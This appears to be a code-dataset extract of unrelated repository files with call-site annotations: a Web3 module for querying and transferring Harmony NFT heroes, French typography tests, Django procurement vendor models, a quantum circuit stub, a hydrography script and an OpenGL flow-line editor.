{"inputs":[{"components":[{"internalType":"uint256","name":"id","type":"uint256"},{"components":[{"internalType":"uint256","name":"summonedTime","type":"uint256"},{"internalType":"uint256","name":"nextSummonTime","type":"uint256"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint32","name":"summons","type":"uint32"},{"internalType":"uint32","name":"maxSummons","type":"uint32"}],"internalType":"struct IHeroTypes.SummoningInfo","name":"summoningInfo","type":"tuple"},{"components":[{"internalType":"uint256","name":"statGenes","type":"uint256"},{"internalType":"uint256","name":"visualGenes","type":"uint256"},{"internalType":"enum IHeroTypes.Rarity","name":"rarity","type":"uint8"},{"internalType":"bool","name":"shiny","type":"bool"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"},{"internalType":"uint8","name":"class","type":"uint8"},{"internalType":"uint8","name":"subClass","type":"uint8"}],"internalType":"struct IHeroTypes.HeroInfo","name":"info","type":"tuple"},{"components":[{"internalType":"uint256","name":"staminaFullAt","type":"uint256"},{"internalType":"uint256","name":"hpFullAt","type":"uint256"},{"internalType":"uint256","name":"mpFullAt","type":"uint256"},{"internalType":"uint16","name":"level","type":"uint16"},{"internalType":"uint64","name":"xp","type":"uint64"},{"internalType":"address","name":"currentQuest","type":"address"},{"internalType":"uint8","name":"sp","type":"uint8"},{"internalType":"enum IHeroTypes.HeroStatus","name":"status","type":"uint8"}],"internalType":"struct IHeroTypes.HeroState","name":"state","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hp","type":"uint16"},{"internalType":"uint16","name":"mp","type":"uint16"},{"internalType":"uint16","name":"stamina","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStats","name":"stats","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"primaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"secondaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"mining","type":"uint16"},{"internalType":"uint16","name":"gardening","type":"uint16"},{"internalType":"uint16","name":"foraging","type":"uint16"},{"internalType":"uint16","name":"fishing","type":"uint16"}],"internalType":"struct IHeroTypes.HeroProfessions","name":"professions","type":"tuple"}],"internalType":"struct IHeroTypes.Hero","name":"_hero","type":"tuple"}],"name":"updateHero","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"userHeroes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}
]
"""
def block_explorer_link(txid):
return 'https://explorer.harmony.one/tx/' + str(txid)
def transfer(hero_id, owner_private_key, owner_nonce, receiver_address, gas_price_gwei, rpc_address, logger):
w3 = Web3(Web3.HTTPProvider(rpc_address))
account = w3.eth.account.privateKeyToAccount(owner_private_key)
w3.eth.default_account = account.address
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
owner = contract.functions.ownerOf(hero_id).call()
logger.info("Hero's owner " + str(owner))
if owner != account.address:
raise Exception("Owner mismatch")
tx = contract.functions.transferFrom(owner, receiver_address, hero_id).buildTransaction(
{'gasPrice': w3.toWei(gas_price_gwei, 'gwei'), 'nonce': owner_nonce})
logger.debug("Signing transaction")
signed_tx = w3.eth.account.sign_transaction(tx, private_key=owner_private_key)
logger.debug("Sending transaction " + str(tx))
ret = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
logger.debug("Transaction successfully sent !")
logger.info("Waiting for transaction " + block_explorer_link(signed_tx.hash.hex()) + " to be mined")
tx_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash=signed_tx.hash, timeout=24 * 3600,
poll_latency=3)
logger.info("Transaction mined !")
logger.info(str(tx_receipt))
def get_owner(hero_id, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
return str(contract.functions.ownerOf(hero_id).call())
def get_users_heroes(user_address, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
return contract.functions.getUserHeroes(Web3.toChecksumAddress(user_address)).call()
def is_approved_for_all(owner, operator, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
return contract.functions.isApprovedForAll(Web3.toChecksumAddress(owner), Web3.toChecksumAddress(operator)).call()
def get_hero(hero_id, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
contract_entry = contract.functions.getHero(hero_id).call()
hero = {}
tuple_index = 0
hero['id'] = contract_entry[tuple_index]
tuple_index = tuple_index + 1
# SummoningInfo
summoning_info = {}
summoning_info['summonedTime'] = contract_entry[tuple_index][0]
summoning_info['nextSummonTime'] = contract_entry[tuple_index][1]
summoning_info['summonerId'] = contract_entry[tuple_index][2]
summoning_info['assistantId'] = contract_entry[tuple_index][3]
summoning_info['summons'] = contract_entry[tuple_index][4]
summoning_info['maxSummons'] = contract_entry[tuple_index][5]
hero['summoningInfo'] = summoning_info
tuple_index = tuple_index + 1
# HeroInfo
hero_info = {}
hero_info['statGenes'] = contract_entry[tuple_index][0]
hero_info['visualGenes'] = contract_entry[tuple_index][1]
hero_info['rarity'] = contract_entry[tuple_index][2]
hero_info['shiny'] = contract_entry[tuple_index][3]
hero_info['generation'] = contract_entry[tuple_index][4]
hero_info['firstName'] = contract_entry[tuple_index][5]
hero_info['lastName'] = contract_entry[tuple_index][6]
hero_info['shinyStyle'] = contract_entry[tuple_index][7]
hero_info['class'] = contract_entry[tuple_index][8]
hero_info['subClass'] = contract_entry[tuple_index][9]
hero['info'] = hero_info
tuple_index = tuple_index + 1
# HeroState
hero_state = {}
hero_state['staminaFullAt'] = contract_entry[tuple_index][0]
hero_state['hpFullAt'] = contract_entry[tuple_index][1]
hero_state['mpFullAt'] = contract_entry[tuple_index][2]
hero_state['level'] = contract_entry[tuple_index][3]
hero_state['xp'] = contract_entry[tuple_index][4]
hero_state['currentQuest'] = contract_entry[tuple_index][5]
hero_state['sp'] = contract_entry[tuple_index][6]
hero_state['status'] = contract_entry[tuple_index][7]
hero['state'] = hero_state
tuple_index = tuple_index + 1
# HeroStats
hero_stats = {}
hero_stats['strength'] = contract_entry[tuple_index][0]
hero_stats['intelligence'] = contract_entry[tuple_index][1]
hero_stats['wisdom'] = contract_entry[tuple_index][2]
hero_stats['luck'] = contract_entry[tuple_index][3]
hero_stats['agility'] = contract_entry[tuple_index][4]
hero_stats['vitality'] = contract_entry[tuple_index][5]
hero_stats['endurance'] = contract_entry[tuple_index][6]
hero_stats['dexterity'] = contract_entry[tuple_index][7]
hero_stats['hp'] = contract_entry[tuple_index][8]
hero_stats['mp'] = contract_entry[tuple_index][9]
hero_stats['stamina'] = contract_entry[tuple_index][10]
hero['stats'] = hero_stats
tuple_index = tuple_index + 1
# primary HeroStatGrowth
hero_primary_stat_growth = {}
hero_primary_stat_growth['strength'] = contract_entry[tuple_index][0]
hero_primary_stat_growth['intelligence'] = contract_entry[tuple_index][1]
hero_primary_stat_growth['wisdom'] = contract_entry[tuple_index][2]
hero_primary_stat_growth['luck'] = contract_entry[tuple_index][3]
hero_primary_stat_growth['agility'] = contract_entry[tuple_index][4]
hero_primary_stat_growth['vitality'] = contract_entry[tuple_index][5]
hero_primary_stat_growth['endurance'] = contract_entry[tuple_index][6]
hero_primary_stat_growth['dexterity'] = contract_entry[tuple_index][7]
hero_primary_stat_growth['hpSm'] = contract_entry[tuple_index][8]
hero_primary_stat_growth['hpRg'] = contract_entry[tuple_index][9]
hero_primary_stat_growth['hpLg'] = contract_entry[tuple_index][10]
hero_primary_stat_growth['mpSm'] = contract_entry[tuple_index][11]
hero_primary_stat_growth['mpRg'] = contract_entry[tuple_index][12]
hero_primary_stat_growth['mpLg'] = contract_entry[tuple_index][13]
hero['primaryStatGrowth'] = hero_primary_stat_growth
tuple_index = tuple_index + 1
# secondary HeroStatGrowth
hero_secondary_stat_growth = {}
hero_secondary_stat_growth['strength'] = contract_entry[tuple_index][0]
hero_secondary_stat_growth['intelligence'] = contract_entry[tuple_index][1]
hero_secondary_stat_growth['wisdom'] = contract_entry[tuple_index][2]
hero_secondary_stat_growth['luck'] = contract_entry[tuple_index][3]
hero_secondary_stat_growth['agility'] = contract_entry[tuple_index][4]
hero_secondary_stat_growth['vitality'] = contract_entry[tuple_index][5]
hero_secondary_stat_growth['endurance'] = contract_entry[tuple_index][6]
hero_secondary_stat_growth['dexterity'] = contract_entry[tuple_index][7]
hero_secondary_stat_growth['hpSm'] = contract_entry[tuple_index][8]
hero_secondary_stat_growth['hpRg'] = contract_entry[tuple_index][9]
hero_secondary_stat_growth['hpLg'] = contract_entry[tuple_index][10]
hero_secondary_stat_growth['mpSm'] = contract_entry[tuple_index][11]
hero_secondary_stat_growth['mpRg'] = contract_entry[tuple_index][12]
hero_secondary_stat_growth['mpLg'] = contract_entry[tuple_index][13]
hero['secondaryStatGrowth'] = hero_secondary_stat_growth
tuple_index = tuple_index + 1
# HeroProfessions
hero_professions = {}
hero_professions['mining'] = contract_entry[tuple_index][0]
hero_professions['gardening'] = contract_entry[tuple_index][1]
hero_professions['foraging'] = contract_entry[tuple_index][2]
hero_professions['fishing'] = contract_entry[tuple_index][3]
hero['professions'] = hero_professions
return hero
def human_readable_hero(raw_hero, hero_male_first_names=None, hero_female_first_names=None, hero_last_names=None):
readable_hero = copy.deepcopy(raw_hero)
readable_hero['info']['rarity'] = hero_utils.parse_rarity(readable_hero['info']['rarity'])
readable_hero['info']['class'] = hero_utils.parse_class(readable_hero['info']['class'])
readable_hero['info']['subClass'] = hero_utils.parse_class(readable_hero['info']['subClass'])
# visualGenes
readable_hero['info']['visualGenes'] = hero_utils.parse_visual_genes(readable_hero['info']['visualGenes'])
# statsGenes
readable_hero['info']['statGenes'] = hero_utils.parse_stat_genes(readable_hero['info']['statGenes'])
# names
if readable_hero['info']['visualGenes']['gender'] == 'male':
if hero_male_first_names is not None:
readable_hero['info']['firstName'] = hero_male_first_names[readable_hero['info']['firstName']]
else:
if hero_female_first_names is not None:
readable_hero['info']['firstName'] = hero_female_first_names[readable_hero['info']['firstName']]
if hero_last_names is not None:
readable_hero['info']['lastName'] = hero_last_names[readable_hero['info']['lastName']]
return readable_hero
| [((71, 23, 71, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(71, 46, 71, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((97, 23, 97, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(97, 46, 97, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((106, 23, 106, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(106, 46, 106, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((115, 23, 115, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(115, 46, 115, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((124, 23, 124, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(124, 46, 124, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((246, 20, 246, 43), 'copy.deepcopy', 'copy.deepcopy', ({(246, 34, 246, 42): 'raw_hero'}, {}), '(raw_hero)', False, 'import copy\n'), ((67, 14, 67, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(67, 32, 67, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((95, 14, 95, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(95, 32, 95, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((104, 14, 104, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(104, 32, 104, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((113, 14, 113, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(113, 32, 113, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((122, 14, 122, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(122, 32, 122, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((109, 44, 109, 80), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(109, 67, 109, 79): 'user_address'}, {}), '(user_address)', False, 'from web3 import Web3\n'), ((118, 47, 118, 76), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(118, 70, 118, 75): 'owner'}, {}), '(owner)', False, 'from web3 import Web3\n'), ((118, 78, 118, 110), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(118, 101, 118, 109): 'operator'}, {}), '(operator)', False, 'from web3 import Web3\n')] |
honzajavorek/tipi | tests/test_langs_fr.py | cbe51192725608b6fba1244a48610ae231b13e08 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from tipi import tipi as _tipi
tipi = lambda s: _tipi(s, lang='fr')
def test_double_quotes():
assert tipi('''"brutal" "quote's"''') == (
'''«brutal» «quote's»'''
)
def test_single_quotes():
assert tipi("""'brutal' 'quote's'""") == (
"""‹brutal› ‹quote's›"""
)
| [((8, 17, 8, 36), 'tipi.tipi', '_tipi', (), '', True, 'from tipi import tipi as _tipi\n')] |
brethauer/mirage | vendor/models.py | 396f61206bf76f997c0535277af918058aa1b827 | from django.db import models
VEHICLE_CHOICES = (
('OASISSB', 'OASIS Small Business'),
('OASIS', 'OASIS Unrestricted')
)
STATUS_CHOICES = (
('P', 'In Progress'),
('C', 'Completed'),
('F', 'Cancelled')
)
class Vendor(models.Model):
name = models.CharField(max_length=128)
duns = models.CharField(max_length=9, unique=True)
duns_4 = models.CharField(max_length=13, unique=True)
cage = models.CharField(max_length=15, null=True)
sam_address = models.CharField(null=True, max_length=128)
sam_citystate = models.CharField(null=True, max_length=128)
cm_name = models.CharField(null=True, max_length=128)
cm_email = models.CharField(null=True, max_length=128)
cm_phone = models.CharField(null=True, max_length=128)
pm_name = models.CharField(null=True, max_length=128)
pm_email = models.CharField(null=True, max_length=128)
pm_phone = models.CharField(null=True, max_length=128)
pools = models.ManyToManyField('Pool', through='PoolPIID')
setasides = models.ManyToManyField('SetAside', null=True, blank=True)
sam_status = models.CharField(null=True, max_length=128)
sam_activation_date = models.DateTimeField(null=True)
sam_expiration_date = models.DateTimeField(null=True)
sam_exclusion = models.NullBooleanField(null=True)
sam_url = models.URLField(null=True)
annual_revenue = models.BigIntegerField(null=True)
number_of_employees = models.IntegerField(null=True)
def __str__(self):
return self.name
class Pool(models.Model):
id = models.CharField(primary_key=True, max_length=128)
name = models.CharField(max_length=128, default='Pool')
number = models.CharField(max_length=128)
vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=7)
naics = models.ManyToManyField('Naics')
threshold = models.CharField(null=True, max_length=128)
def __str__(self):
return "Pool {0} - {1}".format(self.number, self.get_vehicle_display())
class PoolPIID(models.Model):
vendor = models.ForeignKey('Vendor')
pool = models.ForeignKey('Pool')
piid = models.CharField(max_length=128)
def __str__(self):
return "{0} - {1} - {2}".format(self.vendor.name, self.pool.id, self.piid)
class SetAside(models.Model):
code = models.CharField(unique=True, max_length=128)
short_name = models.CharField(max_length=128)
abbreviation = models.CharField(max_length=10, null=True)
far_order = models.IntegerField(null=True)
def __str__(self):
return self.short_name
class Naics(models.Model):
code = models.CharField(max_length=128)
description = models.TextField()
short_code = models.CharField(unique=True, max_length=25)
def __str__(self):
return "{0} - {1}".format(self.code, self.description)
class SamLoad(models.Model):
sam_load = models.DateField()
| [((17, 11, 17, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((18, 11, 18, 54), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((19, 13, 19, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((20, 11, 20, 53), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((21, 18, 21, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((22, 20, 22, 63), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((23, 14, 23, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 15, 24, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((25, 15, 25, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((26, 14, 26, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((27, 15, 27, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((28, 15, 28, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((29, 12, 29, 62), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((30, 16, 30, 73), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((31, 17, 31, 60), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((32, 26, 32, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((33, 26, 33, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((34, 20, 34, 54), 'django.db.models.NullBooleanField', 'models.NullBooleanField', (), '', False, 'from django.db import models\n'), ((35, 14, 35, 40), 'django.db.models.URLField', 'models.URLField', (), '', False, 'from django.db import models\n'), ((36, 21, 36, 54), 'django.db.models.BigIntegerField', 'models.BigIntegerField', (), '', False, 'from django.db import models\n'), ((37, 26, 37, 56), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((45, 9, 45, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((46, 11, 46, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((47, 13, 47, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((48, 14, 48, 69), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((49, 12, 49, 43), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ({(49, 35, 49, 42): '"""Naics"""'}, {}), "('Naics')", False, 'from django.db import models\n'), ((50, 16, 50, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((57, 13, 57, 40), 'django.db.models.ForeignKey', 'models.ForeignKey', ({(57, 31, 57, 39): '"""Vendor"""'}, {}), "('Vendor')", False, 'from django.db import models\n'), ((58, 11, 58, 36), 'django.db.models.ForeignKey', 'models.ForeignKey', ({(58, 29, 58, 35): '"""Pool"""'}, {}), "('Pool')", False, 'from django.db import models\n'), ((59, 11, 59, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((66, 11, 66, 56), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((67, 17, 67, 49), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((68, 19, 68, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((69, 16, 69, 46), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((76, 11, 76, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((77, 18, 77, 36), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((78, 17, 78, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((84, 15, 84, 33), 'django.db.models.DateField', 'models.DateField', ({}, {}), '()', False, 'from django.db import models\n')] |
L-McCormack/two-qubit-simulator | two_qubit_simulator/circuits.py | d7115f0630c9931724aa660dba4b89a50db4e2e0 | """
Contains the QuantumCircuit class
boom.
"""
class QuantumCircuit(object): # pylint: disable=useless-object-inheritance
""" Implements a quantum circuit.
- - - WRITE DOCUMENTATION HERE - - -
"""
def __init__(self):
""" Initialise a QuantumCircuit object """
pass
def add_gate(self, gate):
""" Add a gate to the circuit """
pass
def run_circuit(self, register):
""" Run the circuit on a given quantum register """
pass
def __call__(self, register):
""" Run the circuit on a given quantum register """
pass
| [] |
usgs/water-datapreptools | examples/bathymetricGradient.py | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | import sys
sys.path.append("..") # change environment to see tools
from make_hydrodem import bathymetricGradient
workspace = r"" # path to geodatabase to use as a workspace
snapGrid = r"" # path to snapping grid
hucPoly = r"" # path to local folder polygon
hydrographyArea = r"" # path to NHD area feature class
hydrographyFlowline = r"" # path to NHD flowline feature class
hydrographyWaterbody = r"" # path to NHD water body feature class
cellsize = '' # cell size
bathymetricGradient(workspace, snapGrid, hucPoly, hydrographyArea,
hydrographyFlowline, hydrographyWaterbody,cellsize) | [((2, 0, 2, 21), 'sys.path.append', 'sys.path.append', ({(2, 16, 2, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((13, 0, 14, 52), 'make_hydrodem.bathymetricGradient', 'bathymetricGradient', ({(13, 20, 13, 29): 'workspace', (13, 31, 13, 39): 'snapGrid', (13, 41, 13, 48): 'hucPoly', (13, 50, 13, 65): 'hydrographyArea', (14, 1, 14, 20): 'hydrographyFlowline', (14, 22, 14, 42): 'hydrographyWaterbody', (14, 43, 14, 51): 'cellsize'}, {}), '(workspace, snapGrid, hucPoly, hydrographyArea,\n hydrographyFlowline, hydrographyWaterbody, cellsize)', False, 'from make_hydrodem import bathymetricGradient\n')] |
hxb1997/Menge | out/flowContext.py | 7a09a6236d8eef23e3d15d08873d5918d064761b | # This is the OpenGL context for drawing flow calculation lines
from Context import *
from primitives import Vector2, Segment
from OpenGL.GL import *
from copy import deepcopy
class GLFlowSegment( Segment ):
'''The OpenGL representation of a flow line. Basically a segment
with a direciton indicator. The direction indicator shows which
way flow is expected to cross the line. The flow direction is to
the RIGHT of the segment. The forward direction is the direction
from p1 to p2.'''
def __init__( self, p1, p2 ):
'''Constructor.
@param p1 An instance of Vector2. The start point of the segment.
@param p2 An instance of Vector2. The end point of the segment.
'''
Segment.__init__( self, p1, p2 )
def __str__( self ):
return "GLFlowSegment (%s, %s)" % ( self.p1, self.p2 )
def __repr__( self ):
return str( self )
def drawGL( self, color=(0.1, 1.0, 0.1) ):
'''Draw the flow segment into a GL context.
@param A 3-tuple of floats. The color of the line.
All values should lie in the range [0, 1], to be
interpreted as r, g, b color values.
'''
glPushAttrib( GL_COLOR_BUFFER_BIT )
glBegin( GL_LINES )
glColor3fv( color )
glVertex2f( self.p1.x, self.p1.y )
glVertex2f( self.p2.x, self.p2.y )
mp = self.midPoint()
l = self.magnitude()
n = self.normal() * (0.25 * l )
end = mp + n
glVertex2f( mp.x, mp.y )
glVertex2f( end.x, end.y )
glEnd()
glPopAttrib()
class FlowLineContext( BaseContext ):
'''Context for drawing, creating and editing lines'''
MIN_LINE_LENGTH = 2 # the minimum drag required to draw a line
# edit state - used for knowing what to do with the active line and cancellation
NO_EDIT = 0
EDIT = 1
ADD = 2
def __init__( self, cancelCB=None, editCB=None ):
'''Constructor.
@param cancelCB A callable. An optional callback object
for when flow line drawing is canceled.
@param editCB A callable. An optional callback object
for when a flow line values are edited.
'''
BaseContext.__init__( self )
self.lines = []
self.names = []
self.activeID = -1 # the line currently affected by modifications
self.editState = self.NO_EDIT
self.cancelCB = cancelCB
self.editCB = editCB
self.activeLine = None
self.canDraw = False
self.dragging = False
self.downPost = None
def copy( self, context ):
'''Copy the state of the given FlowLineContext into this'''
assert( isinstance( context, FlowLineContext ) )
self.clear()
self.names = [ a for a in context.names ]
self.lines = deepcopy( context.lines )
def clear( self ):
'''Clears out all of the lines'''
self.lines = []
self.names = []
self.activeID = -1
self.editState = self.NO_EDIT
self.activeLine = None
self.canDraw = False
self.dragging = False
self.downPost = None
def lineCount( self ):
return len( self.lines )
def getName( self, id ):
'''Returns the name associated with the line index, id.
@param id An integer. The index into the stored set of lines.
@return A string. The stored name.
'''
return self.names[ id ]
def getLine( self, id ):
'''Returns the name associated with the line index, id.
@param id An integer. The index into the stored set of lines.
@return An instance of a FlowLine.
'''
return self.lines[ id ]
def addLine( self ):
'''Causes the context to go into new line mode. Returning the new name.'''
self.canDraw = True
self.editState = self.ADD
self.activeID = -1
self.names.append( 'Line %d' % len( self.names ) )
self.lines.append( GLFlowSegment( Vector2(0, 0), Vector2(0, 0) ) )
self.activeLine = self.lines[-1]
return self.names[-1]
def editLine( self, idx ):
'''Edits the indicated line'''
if ( self.editState == self.ADD): return
if ( idx < 0 ):
self.editState = self.NO_EDIT
self.canDraw = False
self.activeID = -1
else:
self.editState = self.EDIT
self.canDraw = True
self.activeID = idx
def setLineName( self, idx, name ):
'''Sets the name for the line with the given index'''
self.names[ idx ] = name
def deleteLine( self, idx ):
'''Removes a line from the set'''
assert( idx >= 0 and idx < len( self.lines ) )
self.lines.pop( idx )
self.names.pop( idx )
self.activeID = -1
def flipLine( self, idx ):
'''Flips the direction of the line in the set'''
assert( idx >= 0 and idx < len( self.lines ) )
self.lines[ idx ].flip()
def setActive( self, idx ):
'''Sets the active line'''
self.activeID = idx
def stopEdit( self ):
'''Stops the ability to edit'''
self.editState = self.NO_EDIT
self.canDraw = False
def getLineCount( self ):
"""Returns the number of defined lines"""
return len( self.lines )
def setMultiLines( self, names, lines ):
'''Sets the lines in the context with the given names and lines.
It is asserted that len( names ) == len( lines ).
@param names A list of strings. One name per line.
@param lines A list of Segment instaces. One line per name.
'''
self.lines = map( lambda x: GLFlowSegment( x.p1, x.p2 ), lines )
self.names = names
self.activeID = -1
self.editState = self.NO_EDIT
def handleMouse ( self, evt, view ):
"""Detects click, drag, release and creates a line"""
result = ContextResult()
try:
event = self.canonicalEvent( evt )
except ValueError as e:
return result
if ( not self.canDraw ):
return result
if ( event.noModifiers() ):
btn = event.button
eX = event.x
eY = event.y
if ( event.type == MouseEvent.DOWN ): #QtCore.QEvent.MouseButtonPress ):
if ( btn == MouseEvent.LEFT ):
self.downPos = Vector2( eX, eY )
x, y = view.screenToWorld( ( eX, eY ) )
p1 = Vector2( x, y )
self.activeLine = GLFlowSegment( p1, p1 )
result.set( True, True, False )
self.dragging = True
self.notifyEdit( self.activeLine )
elif ( btn == MouseEvent.RIGHT and self.dragging ):
# cancel the edit
if ( self.editState == self.ADD ):
self.editState = self.NO_EDIT
self.lines.pop(-1)
self.names.pop(-1)
if ( not self.cancelCB is None ):
self.cancelCB()
self.notifyEdit( None )
canceled = self.activeLine != None
self.activeLine = None
self.dragging = False
result.set( canceled, canceled, False )
elif ( event.type == MouseEvent.UP ):
if ( btn == MouseEvent.LEFT and self.dragging ):
endPos = Vector2( eX, eY )
if ( (endPos - self.downPos).magnitude() >= self.MIN_LINE_LENGTH ):
if ( self.editState == self.ADD ):
self.activeID = len( self.lines ) - 1
